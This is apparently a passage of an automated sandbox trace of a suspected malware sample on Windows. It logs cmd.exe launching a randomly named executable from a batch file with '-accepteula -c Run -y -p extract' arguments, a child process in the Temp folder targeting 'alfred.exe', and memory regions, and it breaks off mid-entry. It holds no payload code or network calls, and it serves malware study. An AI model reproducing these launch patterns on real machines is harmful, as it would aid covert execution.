[0269.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.464] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f178, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f178*=0x2) returned 1 [0269.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0269.464] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f184 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0269.464] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f184 | out: _Buffer=">") returned 1 [0269.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.464] GetFileType (hFile=0x3c) returned 0x2 [0269.464] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.464] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f164 | out: lpMode=0x92f164) returned 1 [0269.466] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.466] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f17c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f17c*=0x1e) returned 1 [0269.466] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.466] GetFileType (hFile=0x3c) returned 0x2 [0269.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.466] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f404 | out: lpMode=0x92f404) returned 1 [0269.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.467] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x92f41c, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x92f41c*=0x1) returned 1 [0269.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.467] GetFileType (hFile=0x3c) returned 0x2 [0269.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.467] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f3f4 | out: lpMode=0x92f3f4) returned 1 [0269.467] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.467] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xab8698*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x92f40c, lpReserved=0x0 | out: lpBuffer=0xab8698*, lpNumberOfCharsWritten=0x92f40c*=0xc) returned 1 [0269.468] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f414 | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0269.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.468] GetFileType (hFile=0x3c) returned 0x2 [0269.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.468] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f3ec | out: lpMode=0x92f3ec) returned 1 [0269.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.468] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x92f404, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f404*=0x2c) returned 1 [0269.469] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f424 | out: _Buffer=") ") returned 2 [0269.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.469] GetFileType (hFile=0x3c) returned 0x2 [0269.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.469] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f3fc | out: lpMode=0x92f3fc) returned 1 [0269.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.469] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f414, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f414*=0x2) returned 1 [0269.469] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f438 | out: _Buffer="\r\n") returned 2 [0269.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.469] GetFileType (hFile=0x3c) returned 0x2 [0269.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0269.469] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f410 | out: lpMode=0x92f410) returned 1 [0269.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0269.470] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f428, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f428*=0x2) returned 1 [0269.470] GetConsoleTitleW (in: lpConsoleTitle=0x92ef50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0269.470] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0269.470] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0269.470] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0269.470] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0269.470] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0269.470] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0269.471] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0269.472] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0269.472] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0269.472] SetErrorMode (uMode=0x0) returned 0x0 [0269.472] SetErrorMode (uMode=0x1) returned 0x0 [0269.472] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaaf9c0, lpFilePart=0x92ea5c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92ea5c*="Desktop") returned 0x1d [0269.472] SetErrorMode (uMode=0x0) returned 0x1 [0269.473] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0269.473] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0269.473] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0269.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.473] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x92e808, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92e808) returned 0xaa42a8 [0269.473] FindClose (in: hFindFile=0xaa42a8 | out: hFindFile=0xaa42a8) returned 1 [0269.473] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0269.473] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0269.473] GetConsoleTitleW (in: lpConsoleTitle=0x92ecdc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0269.474] InitializeProcThreadAttributeList (in: lpAttributeList=0x92ec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x92ebec | out: lpAttributeList=0x92ec08, lpSize=0x92ebec) returned 1 [0269.474] UpdateProcThreadAttribute (in: lpAttributeList=0x92ec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x92ebf4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x92ec08, lpPreviousValue=0x0) returned 1 [0269.474] GetStartupInfoW (in: lpStartupInfo=0x92ec40 | out: lpStartupInfo=0x92ec40*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Gen", _MaxCount=0x7) returned -3 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.474] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0269.475] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0269.475] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0269.475] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x92eb90*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x92ebdc | out: lpCommandLine="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", lpProcessInformation=0x92ebdc*(hProcess=0xb8, hThread=0xcc, dwProcessId=0xbd4, dwThreadId=0x43c)) returned 1 [0269.481] CloseHandle (hObject=0xcc) returned 1 [0269.481] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0269.481] GetEnvironmentStringsW () returned 0xaad550* [0269.481] FreeEnvironmentStringsA (penv="=") returned 1 [0269.481] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0282.792] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x92eb74 | out: lpExitCode=0x92eb74*=0x0) returned 1 [0282.792] CloseHandle (hObject=0xb8) returned 1 [0282.792] _vsnwprintf (in: _Buffer=0x92ec5c, _BufferCount=0x13, _Format="%08X", _ArgList=0x92eb7c | out: _Buffer="00000000") returned 8 [0282.792] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0282.792] GetEnvironmentStringsW () returned 0xaad550* [0282.792] FreeEnvironmentStringsA (penv="=") returned 1 [0282.793] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0282.793] GetEnvironmentStringsW () returned 0xaad550* [0282.793] FreeEnvironmentStringsA (penv="=") returned 1 [0282.793] DeleteProcThreadAttributeList (in: lpAttributeList=0x92ec08 | out: lpAttributeList=0x92ec08) [0282.793] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.793] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0282.793] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.793] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0282.794] _get_osfhandle (_FileHandle=0) returned 0x38 [0282.794] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0282.794] SetConsoleInputExeNameW () returned 0x1 [0282.794] GetConsoleOutputCP () returned 0x1b5 [0282.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0282.794] SetThreadUILanguage (LangId=0x0) returned 0x409 [0282.795] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0282.795] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0282.795] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.795] SetFilePointer (in: hFile=0xb8, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0282.795] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.795] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0282.796] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0x0, lpOverlapped=0x0) returned 1 [0282.796] GetLastError () returned 0x0 [0282.796] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.796] GetFileType (hFile=0xb8) returned 0x1 [0282.796] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.796] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0282.796] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.796] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0282.796] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0x0, lpOverlapped=0x0) returned 1 [0282.796] GetLastError () returned 0x0 [0282.796] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.796] GetFileType (hFile=0xb8) returned 0x1 [0282.796] _get_osfhandle (_FileHandle=3) returned 0xb8 [0282.796] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0282.796] longjmp () [0282.796] _tell (_FileHandle=3) returned 226 [0282.796] _close (_FileHandle=3) returned 0 [0282.796] CmdBatNotificationStub () returned 0x1 [0282.796] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.796] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0282.797] _get_osfhandle (_FileHandle=1) returned 0x3c [0282.797] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0282.797] _get_osfhandle (_FileHandle=0) returned 0x38 [0282.797] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0282.797] SetConsoleInputExeNameW () returned 0x1 [0282.797] GetConsoleOutputCP () returned 0x1b5 [0282.797] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0282.797] SetThreadUILanguage (LangId=0x0) returned 0x409 [0282.798] exit (_Code=0) Thread: id = 159 os_tid = 0xe90 Process: id = "26" image_name = "vidhs3md64.exe" filename = "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe" page_root = "0x66bf8000" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0xe34" cmd_line = "vIDhS3md.exe -accepteula \"alfred.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1880 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1881 start_va = 0x30000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1882 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1883 start_va = 0x150000 end_va = 0x153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 1884 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1885 start_va = 0x7fea3000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea3000" filename = "" Region: id = 1886 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1887 start_va = 0x140000000 end_va = 0x140045fff entry_point = 0x140000000 region_type = mapped_file name = "vidhs3md64.exe" filename = "\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe") Region: id = 1888 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1889 start_va = 0x7ff5ffff4000 end_va = 